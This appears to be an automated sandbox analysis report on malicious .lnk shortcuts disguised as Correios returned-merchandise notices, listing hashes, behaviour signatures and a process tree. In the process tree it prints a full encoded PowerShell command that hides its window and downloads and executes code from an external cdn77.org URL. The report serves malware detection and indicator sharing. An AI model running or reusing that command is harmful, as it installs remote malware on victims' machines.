Overview
overview
10Static
static
1Mercadoria...0W.lnk
windows7-x64
10Mercadoria...0W.lnk
windows10-2004-x64
10Mercadoria...P8.lnk
windows7-x64
10Mercadoria...P8.lnk
windows10-2004-x64
10Mercadoria...2W.lnk
windows7-x64
10Mercadoria...2W.lnk
windows10-2004-x64
10Mercadoria...XY.lnk
windows7-x64
10Mercadoria...XY.lnk
windows10-2004-x64
10Mercadoria...8J.lnk
windows7-x64
10Mercadoria...8J.lnk
windows10-2004-x64
10Mercadoria...EM.lnk
windows7-x64
10Mercadoria...EM.lnk
windows10-2004-x64
10Mercadoria...25.lnk
windows7-x64
10Mercadoria...25.lnk
windows10-2004-x64
10Mercadoria...01.lnk
windows7-x64
10Mercadoria...01.lnk
windows10-2004-x64
10Analysis
-
max time kernel
94s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
13/09/2024, 19:03
Static task
static1
Behavioral task
behavioral1
Sample
Mercadoria_Devolvida-Correios-0JY43R0W.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Mercadoria_Devolvida-Correios-0JY43R0W.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
Mercadoria_Devolvida-Correios-1SNBA8XY.lnk
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
Mercadoria_Devolvida-Correios-1SNBA8XY.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win7-20240708-en
Behavioral task
behavioral10
Sample
Mercadoria_Devolvida-Correios-1SU3RI8J.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
Mercadoria_Devolvida-Correios-1YMU5EEM.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
Mercadoria_Devolvida-Correios-22ES4D25.lnk
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
Mercadoria_Devolvida-Correios-22ES4D25.lnk
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Resource
win10v2004-20240802-en
General
-
Target
Mercadoria_Devolvida-Correios-1A4D7UP8.lnk
-
Size
3KB
-
MD5
246e74b6fffb9d5994f7f70bb6509b45
-
SHA1
4b7bdf4808ce987b9f94ea40bdd081217867483a
-
SHA256
0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
-
SHA512
178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08
Malware Config
Extracted
https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 1856 powershell.exe 9 1856 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1856 powershell.exe 1856 powershell.exe 1856 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1856 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5080 wrote to memory of 1856 5080 cmd.exe 84 PID 5080 wrote to memory of 1856 5080 cmd.exe 84 PID 1856 wrote to memory of 1676 1856 powershell.exe 85 PID 1856 wrote to memory of 1676 1856 powershell.exe 85 PID 1676 wrote to memory of 2920 1676 csc.exe 88 PID 1676 wrote to memory of 2920 1676 csc.exe 88
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1A4D7UP8.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1856 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sbbuln4c\sbbuln4c.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7251.tmp" "c:\Users\Admin\AppData\Local\Temp\sbbuln4c\CSC1883F54E64FC4A0A898B592DE4DD9379.TMP"4⤵PID:2920
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD50c56caebbacd9658180f743fb328ed57
SHA1beb531aecbc184ab0f83644a5243c8ed7ed3ec08
SHA256eeaed0c29820c9b21774d87bf868c2ece9155efce8677611078ea2750b1fb1e9
SHA5123577301531639fa203933e2e901f32e310776268b42eb822cc511e503715ac2ed3bc80512a4dbbf26924468d886d503aed4877804bd44b9cc51936cfaea6fe02
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD593136c8e3c4ba12aa3271b9e7d8a32ac
SHA1a9b465468e668277e0b6406a5bd558e2e8e895e2
SHA256fb721b303e5d383cb5759338098fc309f81032a0bdea29e2321078d01e894343
SHA51205f7edb3773b80bb572f1c16222837aaf17f537512332e14c550800568d907f4628fc7db70fdc21345c7b094df2e2efd9a0192880546e0325aa6902e3631b72e
-
Filesize
652B
MD599d0153f132585f9ed0ae9726cc53a8d
SHA1e71eaf20bb76ab29c5d3d2ed1d1ece2faf3ae598
SHA25680ec02de9fd62f91ba3cce1fd295b04f09d381d1db15422323b4e98809cc81e9
SHA5124ae13ba3ec9e23e6ad64c3b88f6b36bd20479768c4f4bc3cd225a7834013c761368c1c663c2bc2aa35d7b5957ff1deda507f5990381ddbaec7469373717e7e9b
-
Filesize
187B
MD57b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA2566caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA5127322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd
-
Filesize
369B
MD5cb791f64252bb1c1473d7b2b955edda4
SHA10fb2ce5727002860c52969a64953fefc223f842f
SHA2564d4f6a5e133deb10f291bc1f6a40d89d2a8c0955ed4c4ad6b1166c7e4930c567
SHA512c375719f1f2084372cd0b8ab821c2b45ff2f27915179af649ca89657791d326a46ebd61e8b4e69de7214bd3e2ce3691b383e82e2938c6f8b68a38f817a8ae7c9